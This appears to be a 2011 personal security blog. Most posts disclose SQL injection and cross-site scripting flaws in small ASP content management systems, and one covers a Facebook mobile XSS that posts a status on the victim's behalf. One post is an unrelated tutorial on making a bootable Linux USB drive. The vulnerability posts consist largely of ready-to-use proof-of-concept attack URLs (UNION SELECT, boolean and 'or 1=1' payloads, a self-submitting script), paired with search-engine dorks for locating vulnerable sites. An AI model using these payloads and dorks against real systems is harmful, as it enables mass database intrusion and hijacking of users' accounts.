Tuesday, March 29, 2011

New XSS at m.facebook.com

So,noticed that there's a new XSS vulnerability found at facebook by someone.
Figured out after saw my friend update his facebook status in Indonesian language.


so,the what the attacker can do is when a victim click the link,the victim will automatically update his/her facebook status via..facebook own apps!!
u can see the status is updated via Share from the screenshot.

POC of XSS


so,how the attacker do to make the victim will update their status just by clicking the link??

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E

p/s
- if u want to click the link without updating your facebook,logout first :D
- make the shorten url become the real url first
- still,never click.maybe some attacker can use a dangerous script for something bad attempt
- just remove the status update before your friend click it.pls dont share for fun.it can be something that dangerous for your facebook account if the attacker want to.

edited :
- facebook team already fixed this vuln.
- my friend also blogged about this. here
disclaimer : i'm not the one found this vuln at first.kudos to the real founder.
Share:

Wednesday, March 23, 2011

CAPSoft CMS Multiple Vulnerabilities


Title : CAPSoft CMS Multiple Vulnerabilities
Vendor : http://www.capsoft.com.ar
Found by : p0pc0rn


SQL
---
Vulnerable Parameters are

Method = GET
------------
http://site.com/noticia.asp?id=[SQL]
http://site.com/imprimir.asp?tabla=[content_name]&id=[SQL]
http://site.com/product.asp?intProdID=[SQL]
http://site.com/productosporcategoria.asp?intCatalogID=[SQL]

POC
---
http://site.com/noticia.asp?id=1 union select 0 from test.a

Method = POST
-------------
buscador.asp
ingresar.asp

XSS
---
http://site.com/diseno_web.asp?pcia=[XSS]
http://site.com/productosporcategoria.asp?intCatalogID=[id_number]&strCatalog_NAME=[XSS]


thanks,
-p0pc0rn-
Share:

Inventory Mojo Software Vulnerable to Multiple SQL Injections


Title : Inventory Mojo Software Vulnerable to Multiple SQL Injections
Found by : p0pc0rn
Dork : intext:"Powered by Inventory Mojo Software."

SQL
---
Vulnerable Parameters are

Method = GET
------------
categoria.asp
producto.asp
srubro.asp
marca.asp

Method = POST
-------------
buscar.asp
Login.asp
NewUser.asp
do_addToNewsletter.asp

POC
---
http://site.com/categoria.asp?CT=6' and '1'='1 TRUE
http://site.com/categoria.asp?CT=6' and '1'='0 FALSE

thanks,
-p0pc0rn-
Share:

Sunday, March 20, 2011

Shimbi CMS Vulnerable to Multiple SQL Injections


Title : Shimbi CMS Vulnerable to Multiple SQL Injections
Vendor : http://www.shimbi.in/
Found by : p0pc0rn
Dork : intext:"Powered By Shimbi CMS"


SQL Injection in details.php parameter
---------------------------------------
http://site.com/details.php?id=[sql]

POC
---
http://site.com/details.php?id=112 UNION SELECT 1,2,3,4,version(),6,7,8


SQL Injection in faq_details.php parameter
---------------------------------------
http://site.com/faq_details.php?flag=q&id=[sql]

POC
---
http://site.com/faq_details.php?flag=q&id=1'


SQL Injection in blog/addComment.php parameter
---------------------------------------
http://site.com/blog/addComment.php?topic_id=[sql]

POC
---
http://site.com/blog/addComment.php?stat=stat&type=t&category_id=9&topic_id=-122/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--


thanks,
-p0pc0rn-
Share:

Wednesday, March 16, 2011

OnePlug CMS Vulnerable to Multiple SQL Injection


Title : OnePlug CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.webpromo-inc.com/
Found by : p0pc0rn
Dork : intext:"Powered by OnePlug CMS"


SQL - Microsoft Access
-------------------------------
Parameters
index.asp?Team_ID=[SQL]
service_info.asp?Service_ID=[SQL]
product_details.asp?Product_ID=[SQL]
product_list.asp?Category_ID=[SQL]
product_info.asp?Product_ID=[SQL]
category_list.asp?Category_ID=[SQL]

more..

POC
---
http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a



thanks,
-p0pc0rn-
Share:

Tuesday, March 15, 2011

Triware CMS Vulnerable to Multiple SQL Injection

Title : Triware CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.triware.ca/
Found by : p0pc0rn
Dork : intext:"Site by Triware Technologies Inc"

SQL - Jet Engine Database Error
-------------------------------
Parameter
http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]
http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

SQL - Unclosed Quotation Mark
-----------------------------
http://www.site.com/default.aspx?Content=[SQL]

POC
---
http://site.com/default.asp?com=Pages&id=1&m=1 union select 0 from test.a
http://www.site.com/default.aspx?Content=Place'

thanks,
-p0pc0rn-
Share:

VoiceCMS Vulnerable to SQL Injection


Title : VoiceCMS Vulnerable to SQL Injection
Vendor : http://www.voicecms.ca
Found by : p0pc0rn
Dork
: intext:"Powered by VoiceCMS"
: intext:"powered by triware"


SQL - Jet Engine Database Error
-------------------------------
Parameter
http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]
http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

POC
---
http://site.com/default.asp?com=PhotoGallery&id=1 union select 0 from test.a&m=1




thanks,
-p0pc0rn-
Share:

Sunday, March 13, 2011

Universal USB Installer - Easy Way to Make Bootable USB

I want to share with all how to make USB bootable linux using Universal USB Installer.

What you need?
- Any Linux image(.iso) that you want to make it bootable using USB.
- Flashdrive,thumbdrive minimum with 1Gb size.
- And make sure your PC have the USB port :)

How to use?

1 - Download the installer from here
http://www.pendrivelinux.com/downloads/Universal-USB-Installer/Universal-USB-Installer-1.8.3.5.exe

2 - After that, just run the file.
a) I agree. Then choose your preferred.
b) find the location to the image.
c) In my case, the installer cant detect my image's location automatically,so I just put the full path manually in the location box. As example I put my Fedora at Desktop. So the full path will be
C:\Users\p0pc0rn\Desktop\Fedora-14-i686-Live-Desktop.iso

3 - Then choose your USB Drive. Tick format so it will format your USB to FAT32.

4 - And then you just need to wait until it complete.

Have a try! :)

credit to : http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

other recommended software
- unetbootin
- linuxliveusb
Share:

Wednesday, March 9, 2011

Web Designed by LUCH Vulnerable to SQL Injection


Title : Web Designed by LUCH Vulnerable to SQL Injection
Vendor : http://www.luch.co.il
Found by: p0pc0rn


SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a



thanks,
-p0pc0rn-
Share:

Tuesday, March 8, 2011

Web Design by Webz Vulnerable to SQL Injection


Title : Web Design by Webz Vulnerable to SQL Injection
Web : http://www.webz.com.my/
Found by: p0pc0rn 08/03/2011
Dork : intext:"Web Design by Webz" filetype:asp



SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/xxx.asp?id=[SQL]
http://site.com/xxx.asp?catID=[SQL]
http://site.com/xxx.asp?brandID=[SQL]

and other parameters are vulnerable to SQL Injection

POC
---

http://site.com/xxx.asp?id=1 union select 1 from test.a


thanks,
-p0pc0rn-
Share:

EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection


Title : EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Web : http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork : intext:"Powered by EZPub"


SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a


thanks,
-p0pc0rn-
Share:

Sunday, March 6, 2011

Tuesday, March 1, 2011

WSI CMS Multiple SQL Injections


Title : WSI CMS Multiple SQL Injections
Web : http://www.wsicorporate.com/
Found by: p0pc0rn 01/03/2011
Dork : intext:"Powered by WSI" filetype:asp


SQL
---

http://site.com/xxx.asp?PId=[SQL]
http://site.com/xxx.asp?Id=[SQL]
http://site.com/form.asp?formname=[name][SQL]

POC
---

http://site.com/xxx.asp?PId=1234 having 1=1
http://site.com/xxx.asp?Id=4321 having 1=1
http://site.com/form.asp?formname=test' union select 1,2 from test.aa





thanks,
-p0pc0rn-
Share:

CMS Powered By Queo.mx Vulnerable to SQL Injection


Title : CMS Powered By Queo.mx Vulnerable to SQL Injection
Web : http://queo.com.mx/ :
Found By: p0pc0rn 01/03/2011
Dork
: intext:"Queo.com.mx" filetype:asp
: inurl:"cms/content.asp?company="


SQL
---

http://site.com/cms/content.asp?company=[SQL]

POC
---

http://site.com/cms/content.asp?company=109' or '1'='1



thanks,
-p0pc0rn-
Share:

CYSM CMS Vulnerable to SQL Injection


Title : CYSM CMS Vulnerable to SQL Injection
Web : http://www.cysm.com.mx
Found by: p0pc0rn 01/03/2011


SQL
---

http://site.com/Page.asp?Id=[SQL]

POC
---

http://site.com/Page.asp?Id=1337 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users



thanks,
-p0pc0rn-
Share:

ortal Networks - Internet Based Solutions Vulnerable CMS Multiple Vulnerabilities


Title : Portal Networks - Internet Based Solutions Vulnerable CMS Multiple Vulnerabilities
Web : http://www.portalnetworks.com.mx/
Found by: p0pc0rn 01/03/2011
Dork : intext:"Powered by: Portal Networks - Internet Based Solutions" asp

SQL
---

http://site.com/buscar.asp?linea=[SQL]
http://site.com/buscar.asp?q=[SQL]
http://site.com/detalle.asp?clave=[SQL]
http://site.com/searchProduct.asp?action=search&qSearch=[SQL]

XSS
---

http://site.com/buscar.asp?q=[XSS]
http://site.com/error.asp?Error=[XSS]

POC
---





thanks,
-p0pc0rn-
Share: